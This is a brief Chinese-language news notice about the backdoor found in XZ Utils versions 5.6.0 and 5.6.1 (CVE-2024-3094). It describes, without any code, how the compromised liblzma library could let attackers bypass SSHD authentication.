3月29日，Openwall 邮件列表中公布了名为 XZ Utils 的流行软件包中的后门。涉及混淆恶意代码的供应链攻击。

开发人员表示此次涉及一个名为 liblzma 的库，SSHD 使用该库，SSHD 是用于远程访问的 Internet 基础设施的关键部分。加载后，CVE-2024-3094会影响 SSHD 的身份验证，恶意代码可能允许攻击者通过后门版本的SSH非授权获取系统的访问权限。恶意代码存在于XZ版本的5.6.0 、 5.6.1。

CVE-2024-3094